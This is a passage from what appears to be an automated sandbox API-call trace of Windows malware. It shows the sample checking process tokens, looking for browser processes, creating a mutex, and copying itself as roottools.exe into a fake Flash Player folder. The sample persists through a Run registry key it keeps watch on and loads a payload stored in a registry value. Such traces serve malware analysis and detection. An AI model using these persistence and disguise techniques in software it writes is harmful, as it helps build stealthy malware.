TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0612.797] GetLastError () returned 0x7a [0612.797] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0612.797] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0612.797] CloseHandle (hObject=0x668) returned 1 [0612.798] CloseHandle (hObject=0x298) returned 1 [0612.798] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0612.798] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0612.798] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0612.798] GetLastError () returned 0x7a [0612.798] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0612.798] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0612.798] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0612.798] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0612.798] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0612.798] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0612.798] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0612.798] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0612.798] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0612.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0612.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0612.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0612.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0612.798] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0612.798] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0612.798] GetLastError () returned 0x7a [0612.798] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0612.798] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0612.798] CloseHandle (hObject=0x668) returned 1 [0612.798] CloseHandle (hObject=0x298) returned 1 [0612.798] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0612.798] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0612.798] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0612.798] GetLastError () returned 0x7a [0612.798] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0612.798] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0612.798] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0612.798] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0612.798] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0612.798] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0612.798] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0612.798] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0612.798] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0612.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0612.799] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0612.799] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) Thread: id = 354 os_tid = 0x74c [0458.135] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0458.135] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="B3") returned 2 [0458.135] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="F6") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="E5") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="3F") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="12") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="0A") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="5B") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="E5") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="82") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="5B") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="9C") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="06") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="15") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="9B") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="B3") returned 2 [0458.136] wvnsprintfW (in: pszDest=0x26ce890, cchDest=3, pszFmt="%02X", arglist=0x26ce86c | out: pszDest="F4") returned 2 [0458.136] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="B3F6E53F120A5BE5825B9C06159BB3F4") returned 0xb8 [0458.136] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0458.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26ce6a6, cbMultiByte=76, lpWideCharStr=0x26ce4fc, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exeɬɬɬɬĥɬ誵\x07ɬ\x04") returned 76 [0458.136] PathCombineW (in: pszDest=0x26ce944, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" [0458.136] PathQuoteSpacesW (in: lpsz="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: lpsz="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"") returned 1 [0458.136] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xfc [0458.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x44fcf8, cbMultiByte=45, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0458.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x44fcf8, cbMultiByte=45, lpWideCharStr=0x44fd38, cchWideChar=46 | out: lpWideCharStr="Software\\Microsoft\\Windows\\Currentversion\\Run") returned 45 [0458.136] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\Currentversion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x12, lpSecurityAttributes=0x0, phkResult=0x26cebec, lpdwDisposition=0x0 | out: phkResult=0x26cebec*=0x104, lpdwDisposition=0x0) returned 0x0 [0458.136] RegSetValueExW (in: hKey=0x104, lpValueName="roottools.exe", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"", cbData=0xe2 | out: lpData="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"") returned 0x0 [0458.136] RegFlushKey (hKey=0x104) returned 0x0 [0458.209] RegNotifyChangeKeyValue (hKey=0x104, bWatchSubtree=0, dwNotifyFilter=0x4, hEvent=0xfc, fAsynchronous=1) returned 0x0 [0458.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26ce8c6, cbMultiByte=76, lpWideCharStr=0x26ce71c, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 76 [0458.209] PathCombineW (in: pszDest=0x26cee68, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" [0458.209] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0458.209] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x26ceb3c | out: lpFileSize=0x26ceb3c*=196608) returned 1 [0458.209] VirtualAlloc (lpAddress=0x0, dwSize=0x30000, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0458.209] ReadFile (in: hFile=0x1a4, lpBuffer=0x160000, nNumberOfBytesToRead=0x30000, lpNumberOfBytesRead=0x26ceb4c, lpOverlapped=0x0 | out: lpBuffer=0x160000*, lpNumberOfBytesRead=0x26ceb4c*=0x30000, lpOverlapped=0x0) returned 1 [0458.212] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0458.212] CloseHandle (hObject=0x1a4) returned 1 [0458.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cf21e, cbMultiByte=76, lpWideCharStr=0x26cf6a8, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 76 [0458.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cf21e, cbMultiByte=62, lpWideCharStr=0x26cf070, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 62 [0458.213] PathCombineW (in: pszDest=0x26cf4a0, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0458.213] FindFirstChangeNotificationW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming", bWatchSubtree=1, dwNotifyFilter=0x13) returned 0x1a4 [0458.213] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0458.735] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0458.735] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0458.735] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0458.735] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0459.075] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0459.075] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0459.076] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0459.076] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0459.076] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0459.076] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0459.076] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0459.076] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0460.621] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0460.621] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0460.621] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0460.621] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0460.621] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0460.621] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0460.621] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0460.622] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0587.762] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0587.762] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0587.762] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0587.762] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0587.762] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0587.763] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0587.763] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0587.763] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0591.197] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0591.198] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0591.198] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0591.198] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0591.434] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0591.434] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0591.434] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0591.434] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0591.436] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0591.436] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0591.436] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0591.436] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0591.478] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0591.478] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0591.478] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0591.478] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0591.479] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0591.480] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0591.480] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0591.480] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0591.519] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0591.519] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0591.520] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0591.520] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0591.521] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0591.521] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0591.522] FindNextChangeNotification (hChangeHandle=0x1a4) returned 1 [0591.522] WaitForMultipleObjects (nCount=0x3, lpHandles=0x26ceb60*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 355 os_tid = 0x548 [0458.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281f7f2, cbMultiByte=6, lpWideCharStr=0x89730, cchWideChar=10 | out: lpWideCharStr="Acuhcina") returned 6 [0458.137] PathCombineW (in: pszDest=0x88f48, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0458.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281f7fc, cbMultiByte=8, lpWideCharStr=0x89730, cchWideChar=10 | out: lpWideCharStr="Omegovna") returned 8 [0458.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281f6ca, cbMultiByte=85, lpWideCharStr=0x281f3f4, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv癦ʁ霰\x08ʁ茶癦霰\x08\x1c绻") returned 85 [0458.137] PathCombineW (in: pszDest=0x89428, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" [0458.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281f764, cbMultiByte=85, lpWideCharStr=0x281f3f8, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rigʁ霰\x08ʁ茶癦霰\x08\x1c绻") returned 85 [0458.137] PathCombineW (in: pszDest=0x89748, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" [0458.138] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x281f814 | out: phkResult=0x281f814*=0x108) returned 0x0 [0458.138] RegQueryValueExW (in: hKey=0x108, lpValueName="Omegovna", lpReserved=0x0, lpType=0x281f840, lpData=0x0, lpcbData=0x281f828*=0x0 | out: lpType=0x281f840*=0x3, lpData=0x0, lpcbData=0x281f828*=0x6f0) returned 0x0 [0458.138] RegQueryValueExW (in: hKey=0x108, lpValueName="Omegovna", lpReserved=0x0, lpType=0x281f840, lpData=0x3d0590, lpcbData=0x281f828*=0x6f0 | out: lpType=0x281f840*=0x3, lpData=0x3d0590*, lpcbData=0x281f828*=0x6f0) returned 0x0 [0458.138] RegCloseKey (hKey=0x108) returned 0x0 [0458.140] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="4D") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="A3") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="8C") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="1F") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="12") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="D1") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="89") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="46") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="B1") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="7E") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="A3") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="A6") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="54") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="25") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="90") returned 2 [0458.140] wvnsprintfW (in: pszDest=0x281f638, cchDest=3, pszFmt="%02X", arglist=0x281f614 | out: pszDest="59") returned 2 [0458.140] 